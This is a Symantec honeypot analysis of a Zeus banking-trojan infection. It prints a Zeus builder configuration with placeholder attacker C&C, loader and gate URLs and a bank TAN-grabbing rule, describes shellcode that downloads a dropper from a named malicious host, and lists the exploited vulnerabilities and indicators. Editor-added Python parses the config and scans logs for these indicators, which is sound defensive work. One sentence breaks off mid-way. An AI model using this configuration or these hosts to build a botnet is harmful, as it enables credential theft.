HoneyNet Analysis
HoneyPot ID: 377850

Ensure that antivirus software is current to detect this threat.
Ensure that installed software is fully patched to avoid compromise.
There are many versions of Zeus. The bot has modules that hook browser processes to steal browsing
data such as authentication credentials. At the time of writing, we are aware of modules that support
Internet Explorer, Mozilla Firefox, and Opera; since Zeus is actively maintained, modules for other
browsers are likely to follow. An attacker who wants to start a new botnet either purchases the latest
version of Zeus from the malware authors or downloads one of the many leaked versions of the bot for free.
Attackers who use Zeus commonly run the bot binary through a packer so that this widely distributed bot
is not detected by antivirus signatures. Since the Zeus bot has no propagation mechanism of its own,
distribution is left to the attacker building the botnet, which is why the campaigns used to install this
bot vary widely from botnet to botnet. Many methods can be used to deliver the bot to the victim; the
following are the most common seen in the wild:
- Email spam campaigns that lure victims to a malicious site containing exploits, or a message crafted to convince the victim to install the bot from an email attachment.
- Malicious sites that couple drive-by exploit kits with social engineering to install the bot on a victim's computer when the victim visits the site.
- Pay-per-install services, where the attacker pays a third party to install the malware on a victim's computer.
The client-side exploit kits that are commonly seen with a Zeus bot attack are not a part of the Zeus bot
builder. These kits are bought and sold separately; the attacker configures them to install the copy of
Zeus bot that the attacker has built for the current botnet campaign. The attacker configures the exploit
kit so that the Zeus bot is installed when a victim is successfully compromised by the drive-by exploit kit.
This is typically a trivial operation where the attacker simply specifies a URL that stores the attacker’s
copy of Zeus bot. The versatility of Zeus coupled with an exploit kit is likely one of the reasons why
reporters often get confused by this malware and describe it as new.
We will not cover exploit kits in this analysis, but some of the popular kits are Unique, Phoenix, YES,
Eleonore, Liberty, and a relative newcomer called Fragus, which is currently being sold for $800. (See
Figure 1 for a screenshot of the configuration panel for Fragus.) These exploit kits are hosted on a
webserver. When the victim visits this webserver, their system may be compromised if it is vulnerable to
one of the vulnerabilities that the exploit kit targets.
Building Zeus
The process to build a custom Zeus bot for the attacker’s botnet is very easy. The process is driven by a
GUI application (Figure 2) and a configuration file. The attacker selects a configuration file using the
Browse… button in the builder section of the GUI.
entry "StaticConfig"
  ;botnet "btn4"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  url_config "%attacker ip%/cfg.bin"
  url_compip "%attacker ip%/ip.php" 4096
  encryption_key "123123"
  ;blacklist_languages 1049
end

entry "DynamicConfig"
  url_loader "%attacker ip%/botname.exe"
  url_server "%attacker ip%/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
    ;"/cfg1.bin"
  end
  entry "WebFilters"
    "!*.microsoft.com/*"
    "@*/login.osmp.ru/*"
  end
  entry "WebDataFilters"
    ;"http://mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
    ;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
  end
  entry "TANGrabber"
    "https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*"
  end
  entry "DnsMap"
    ;127.0.0.1 microsoft.com
  end
end
The encryption_key is the RC4 key that the bot and the C&C web application use to encrypt the
configuration file and the data exchanged through the gate, so analysing a captured cfg.bin or captured
gate traffic requires the key from the matching build. url_config tells the bot where to fetch its
encrypted configuration, url_server is the gate that receives stolen data and hands out commands,
url_loader is where updated copies of the bot are fetched, and the timer_* values control how often the
bot polls for configuration and sends logs and statistics. The WebFilters, WebDataFilters, WebFakes, and
TANGrabber sections are edited to add the websites and form fields the attacker wishes to monitor and
steal information from. Finally, the DnsMap section makes the bot resolve a domain name to an
attacker-specified address on the infected host. Once the attacker has finished editing the configuration
file, they build the bot with the GUI's Build Config and Build Loader buttons: Build Config produces the
encrypted configuration file and Build Loader produces the bot executable. The customized Zeus bot is now
ready to be deployed. At this point, the attacker will typically pack the executable so that it is not
detected by current antivirus signatures.
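The builder configuration above has a small, regular grammar: `entry "Name"` ... `end` blocks that nest (the Web*, TANGrabber, and DnsMap sections sit inside DynamicConfig), lines beginning with `;` that are comments or disabled directives, keyword lines that carry one or more values, and quote-only lines that are list items. The following Python parser is an added example written for this analysis, not code from the report or from the Zeus builder; it reads that format into a nested structure and pulls out every url_* directive, which is what an analyst wants from a recovered configuration. The embedded sample is the configuration listed above with the report's `%attacker ip%` placeholder kept as-is, and the function names and the dictionary layout are the editor's own.

```python
"""Parse the Zeus builder configuration format.

Added example for this analysis, not code from the report or the builder;
the function names and the nested-dict layout are the editor's choice.
"""
import shlex

# The configuration listed above, embedded as sample input. "%attacker ip%" is
# the report's placeholder, not a real host.
SAMPLE_CONFIG = r'''
entry "StaticConfig"
  ;botnet "btn4"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  url_config "%attacker ip%/cfg.bin"
  url_compip "%attacker ip%/ip.php" 4096
  encryption_key "123123"
  ;blacklist_languages 1049
end
entry "DynamicConfig"
  url_loader "%attacker ip%/botname.exe"
  url_server "%attacker ip%/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
    ;"/cfg1.bin"
  end
  entry "WebFilters"
    "!*.microsoft.com/*"
    "@*/login.osmp.ru/*"
  end
  entry "WebDataFilters"
    ;"http://mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
    ;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
  end
  entry "TANGrabber"
    "https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*"
  end
  entry "DnsMap"
    ;127.0.0.1 microsoft.com
  end
end
'''


def parse_zeus_config(text):
    """Nest entry/end blocks into dicts with 'directives', 'items', 'entries'."""
    def new_entry():
        return {"directives": {}, "items": [], "entries": {}}

    root = new_entry()
    stack = [root]
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                                  # blank or ;comment line
        tokens = shlex.split(line)                    # honours "quoted values"
        if tokens[0] == "entry":
            if len(tokens) != 2:
                raise ValueError(f"line {lineno}: malformed entry header")
            child = new_entry()
            stack[-1]["entries"][tokens[1]] = child
            stack.append(child)
        elif tokens[0] == "end":
            if len(stack) == 1:
                raise ValueError(f"line {lineno}: 'end' without 'entry'")
            stack.pop()
        elif line.startswith('"'):
            # value-only line (WebFilters, TANGrabber, ...): one tuple per line
            stack[-1]["items"].append(tuple(tokens))
        else:
            # keyword followed by values, e.g. url_compip "<url>" 4096
            stack[-1]["directives"][tokens[0]] = tokens[1:]
    if len(stack) != 1:
        raise ValueError("unterminated entry block: missing 'end'")
    return root


def collect_urls(cfg):
    """All url_* directives in the tree: the bot's C&C touch points to block."""
    found = []

    def walk(node):
        for key, values in node["directives"].items():
            if key.startswith("url_") and values:
                found.append((key, values[0]))
        for child in node["entries"].values():
            walk(child)

    walk(cfg)
    return sorted(found)


if __name__ == "__main__":
    for name, url in collect_urls(parse_zeus_config(SAMPLE_CONFIG)):
        print(f"{name:12} {url}")
```

Commented-out directives such as `;botnet "btn4"` and the disabled DnsMap entry do not appear in the result, which is the behaviour you want when deciding which hosts and URL patterns a recovered configuration actually activates; an unterminated block raises rather than silently returning a partial tree.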
When the attacker installs the bot on a victim's computer, the bot appears in the web control panel
(see Figure 3 below). The web GUI allows the attacker to monitor the bot, profile the compromised
system, and send commands for the bot to execute.
Figure 3. Zeus bot web control panel with one bot connected.
Using the control panel, the attacker can run the commands listed in Table 1. Note that the functionality
of the bot varies from version to version. These commands are supported by Zeus bot version 1.2.7.19.
When the JavaScript was decoded, we found that it contained exploits for the following vulnerabilities:
- AOL Radio AmpX ActiveX Control 'ConvertFile()' Buffer Overflow Vulnerability (BID: 35028)
- Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (BID: 35558) [DirectShow ActiveX Control vector]
- Microsoft Internet Explorer ADODB.Stream Object File Installation Weakness (BID: 10514)
- Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability (BID: 30114)
- Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability (BID: 30035)
- Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability (BID: 34169)
- Adobe Reader and Acrobat U3D 'CLODMeshDeclaration' Buffer Overflow Vulnerability (BID: 36689 / CVE-2009-2994)
- Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities (BID: 27641 / CVE-2007-5659)
The exploit pack also included exploits for a Java as well as an Adobe Flash vulnerability. Unfortunately,
we didn’t have enough data captured to be able to identify the exact vulnerabilities that were being
exploited by each of these additional exploits. It’s difficult to identify the exploit kit that was used in the
compromise of this honeypot, but based on the exploits that are included and the script format, we
suspect that it’s either the Eleonore or Phoenix exploit pack, but this is unconfirmed and is merely
conjecture.
When the Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (BID
35558) was exploited on our honeypot, the shellcode that runs first locates the local temporary files
directory using GetTempPathA().
The shellcode then loads the urlmon.dll library and resolves the address of URLDownloadToFile() in it
using GetProcAddress(). Next, the shellcode attempts to download an executable from
hxxp://cronnerberg.com/new/load.php?i=10 to %TempPath%\pdfupd.exe. Once the
The webserver responds to this request with a list of URLs delimited by a semicolon character:
hxxp://atx777.homeip.net/ldx.exe;hxxp://atx777.homeip.net/severa/veton.exe;hxxp://atx777.homeip.net/tbot.exe;
pdfupd.exe downloads each of these executables and installs them on the compromised system. In this
compromise, ldx.exe is the Zeus bot binary; the request for its configuration file, conflake9.bin, can
be seen in Figure 5.
In addition to installing Zeus bot in this compromise, this attacker also installed Waledac. This malware is
known to have a pay-per-install program that miscreants can use to monetize their activity. Since Zeus
bot is designed to collect credentials from web-browsing activity and since Waledac was also dropped
onto this system, this may mean that this attacker had financial motivations.
Because Zeus bot is freely available, easy to use and configure, and contains powerful capabilities,
attackers commonly use it. Attack scenarios will differ on a case-by-case basis, depending on the
motivations and skill of the attacker building the bot network. The Zeus bot is most often employed in
attacks that have financial motivations.
The best defense against Zeus bot is network- and host-based IPS/IDS, current antivirus software, and
keeping network systems up to date with current patches for software vulnerabilities. The malware that
was installed during this attack against our Honeypot is detected by Symantec AntiVirus as Trojan
Horse.
Attack data
Filenames
Filename: pdfupd.exe
SHA1: 7f7403f2c476a2b8aaa09c224dba6f2de2aab269
Filename: ldx.exe
Filename: tbot.exe
SHA1: 1d4d3f3cd3642f102c7f16609e02462fc63fc5d8
Filename: veton.exe
SHA1: b06e994355bda719bd98552933c3b3e2d371bfce
System behavior
Outbound HTTP activity from the affected system.
IP addresses
The following domain names and IPs were involved in this attack:
cronnerberg.com (92.60.176.38)
atx777.homeip.net (95.169.186.103)
lake777.homeip.net (95.169.186.103)
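The downloader stage described earlier (the semicolon-delimited URL list returned by load.php) and the indicators in this section can be turned into a network-side check. The following Python is an added example written for this analysis, not the attacker's or Symantec's code: it parses a dropper response in the format quoted above (refanging the report's hxxp notation), combines the resulting hosts with the domains and IPs listed here, and flags matching requests in a constructed proxy log. The log lines, the log layout, and the function names are the editor's own; the URI patterns for a .bin configuration fetch and a gate.php post are assumptions taken from the default builder configuration shown earlier rather than from captures of this compromise.

```python
"""Correlate this report's indicators with outbound proxy logs.

Added example for this analysis; not the attacker's or Symantec's code.
The log lines are constructed, the indicator values are the ones the
report lists, and the URI patterns are assumptions drawn from the default
Zeus configuration shown earlier.
"""
import re
from urllib.parse import urlsplit

# load.php response as quoted in the report (defanged with "hxxp").
DROPPER_RESPONSE = ("hxxp://atx777.homeip.net/ldx.exe;"
                    "hxxp://atx777.homeip.net/severa/veton.exe;"
                    "hxxp://atx777.homeip.net/tbot.exe;")

# Domains and IPs from the "IP addresses" section of this report.
REPORTED_HOSTS = {
    "cronnerberg.com": "92.60.176.38",
    "atx777.homeip.net": "95.169.186.103",
    "lake777.homeip.net": "95.169.186.103",
}

# URI shapes worth flagging: the dropper fetch seen here, plus the config
# (url_config "*.bin") and gate (url_server "gate.php") paths from the default
# builder configuration. The ".bin" rule is deliberately coarse.
URI_PATTERNS = [
    ("dropper-list", re.compile(r"/load\.php\?i=\d+")),
    ("zeus-config", re.compile(r"/[\w.-]+\.bin$")),
    ("zeus-gate", re.compile(r"/gate\.php$")),
]


def refang(url):
    """Turn the report's hxxp:// notation back into a real scheme."""
    return re.sub(r"^hxxp", "http", url, count=1, flags=re.IGNORECASE)


def parse_dropper_list(body):
    """Split the ';'-delimited list (trailing ';' included) into URLs."""
    return [refang(part.strip()) for part in body.split(";") if part.strip()]


def indicator_hosts(dropper_urls):
    """Known hosts: reported domains, their IPs, and the dropper's hosts."""
    hosts = set(REPORTED_HOSTS) | set(REPORTED_HOSTS.values())
    hosts.update(urlsplit(u).hostname for u in dropper_urls)
    return hosts


# Constructed proxy log: "timestamp client method url", one request per line.
SAMPLE_LOG = """\
2010-02-24T22:41:03Z 10.0.0.15 GET http://www.microsoft.com/en-us/default.aspx
2010-02-24T22:41:09Z 10.0.0.15 GET http://cronnerberg.com/new/load.php?i=10
2010-02-24T22:41:12Z 10.0.0.15 GET http://atx777.homeip.net/ldx.exe
2010-02-24T22:41:15Z 10.0.0.15 GET http://95.169.186.103/conflake9.bin
2010-02-24T22:41:20Z 10.0.0.15 POST http://lake777.homeip.net/gate.php
2010-02-24T22:42:00Z 10.0.0.22 GET http://example.org/index.html
"""


def scan_log(text, hosts):
    """Return (timestamp, client, host, reasons) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue                                  # skip malformed lines
        timestamp, client, _method, url = fields
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        path = parts.path + ("?" + parts.query if parts.query else "")
        reasons = []
        if host in hosts:
            reasons.append("known-host")
        reasons.extend(name for name, pat in URI_PATTERNS if pat.search(path))
        if reasons:
            hits.append((timestamp, client, host, tuple(reasons)))
    return hits


if __name__ == "__main__":
    known = indicator_hosts(parse_dropper_list(DROPPER_RESPONSE))
    for hit in scan_log(SAMPLE_LOG, known):
        print(*hit)
```

The point of combining the two signals is that neither is sufficient alone: the hosts in this report are specific to one campaign and will be rotated, while the .bin and gate.php patterns are generic enough to produce false positives, so a hit on both (a known host plus a Zeus-shaped URI from the same client) is what should page someone.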
Change log
Version 1: February 24, 2010, 23:00 GMT
Initial HoneyNet Analysis released.
Contact information
World Headquarters
Symantec Corporation
20300 Stevens Creek Blvd.
Cupertino, CA 95014
U.S.A.
+1 408 517 8000
www.symantec.com
About Symantec
Symantec, the world leader in Internet security technology, provides a broad range of content and
network security software and appliance solutions to enterprises, individuals, and service providers. The
company is a leading provider of client, gateway, and server security solutions for virus protection,
firewall and virtual private network, vulnerability management, intrusion detection, Internet content and
e-mail filtering and remote management technologies, as well as security services to enterprises and
service providers around the world. Symantec's Norton brand of consumer security products is a leader in
worldwide retail sales and industry awards. Headquartered in Cupertino, Calif., Symantec has worldwide
operations in 38 countries. For more information, please visit www.symantec.com.
DeepSight Conditions: NO WARRANTIES, EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, SHALL APPLY TO THE
DEEPSIGHT SERVICES OR THE MATERIALS PROVIDED BY SYMANTEC TO USERS OF THE DEEPSIGHT SERVICES. SYMANTEC
PROVIDES THE SERVICE(S) AND MATERIALS “AS IS” AND “AS AVAILABLE.” IN NO EVENT WILL SYMANTEC BE LIABLE FOR THE
TRUTH, ACCURACY, RELIABILITY OR COMPLETENESS OF THE SERVICE(S) OR MATERIALS. SYMANTEC MAKES NO WARRANTY
THAT THE SERVICE(S) OR MATERIALS WILL BE UNINTERRUPTED OR TIMELY, OR THAT THEY WILL PROTECT AGAINST
COMPUTER VULNERABILITIES. Please refer to your services agreement or certificate for further information on conditions of use for
the Services and materials.
Trademarks: Symantec, the Symantec logo, and DeepSight are US registered trademarks of Symantec Corporation or its
subsidiaries. DeepSight Analyzer, DeepSight Extractor, and Bugtraq are trademarks of Symantec Corporation or its subsidiaries.
Other brands and products are trademarks of their respective holders.
Quoting Symantec Information and Data: Authorized Users of Symantec's Deep Sight Services may use or quote individual
sentences and paragraphs from the materials provided as part of the Services, but not large portions or the majority of such
materials, solely for purposes of internal communications. Unless otherwise specifically agreed in writing by Symantec, no external
publication of all or any portion of any materials provided by Symantec is permitted.
Copyright © 2010 Symantec Corporation. All rights reserved. Reproduction is forbidden unless authorized.